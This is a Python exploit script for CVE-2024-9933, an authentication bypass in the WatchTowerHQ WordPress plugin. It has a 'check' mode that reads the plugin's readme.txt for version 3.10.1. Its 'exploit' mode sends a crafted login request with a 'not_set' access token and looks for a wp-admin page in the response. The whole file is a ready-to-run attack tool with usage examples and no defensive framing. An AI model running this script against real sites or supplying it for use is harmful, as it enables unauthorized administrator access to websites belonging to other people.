CVE-2024-9933 .py

import requests
import sys

#Nxploit
#Khaled_alenazi
def check_version(base_url):
    
    base_url = base_url.rstrip('/')

    readme_url = f"{base_url}/wp-content/plugins/watchtowerhq/readme.txt"
    try:
        response = requests.get(readme_url)
        if response.status_code == 200:
            if "Stable tag: 3.10.1" in response.text:
                print(f"[+] Vulnerable site detected: {base_url}\n    [*] Readme location: {readme_url}")
                return True
            else:
                print(f"[-] Site is not vulnerable: {base_url}\n    [*] Readme location: {readme_url}")
                return False
        else:
            print(f"[!] Unable to access file: {readme_url} (HTTP {response.status_code})")
            return False
    except requests.RequestException as e:
        print(f"[!] Connection error: {e}")
        return False

def exploit(base_url):
    
    base_url = base_url.rstrip('/')

    
    exploit_url = f"{base_url}/?wht_login=1&access_token=not_set"
    try:
        response = requests.get(exploit_url)
        if "wp-admin" in response.text:
            print(f"[+] Exploitation successful: {exploit_url}")
        else:
            print(f"[-] Exploitation failed: {exploit_url}")
    except requests.RequestException as e:
        print(f"[!] Error during exploitation attempt: {e}")

def show_help():
    print("""
Usage: python CVE-2024-9933 .py [option] [URL]

Options:
  check   : Verify if the target URL is vulnerable.
  exploit : Attempt to exploit the vulnerability on the provided URL.
  

Examples:
  python CVE-2024-9933 .py check http://example.com
  python CVE-2024-9933 .py exploit http://example.com
  
""")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("[!] No option provided, defaulting to 'exploit'.")
        if len(sys.argv) < 3:
            print("[!] Please provide a valid URL.")
            show_help()
        else:
            target_url = sys.argv[1]
            exploit(target_url)
    else:
        option = sys.argv[1].lower()

        if len(sys.argv) < 3:
            print("[!] Please provide a valid URL.")
            show_help()
        else:
            target_url = sys.argv[2]

            if option == "check":
                if check_version(target_url):
                    print("[+] You can proceed with exploitation using the 'exploit' option.")
            elif option == "exploit":
                exploit(target_url)
            else:
                print("[!] Unknown option! Use 'help' for guidance.")
                show_help()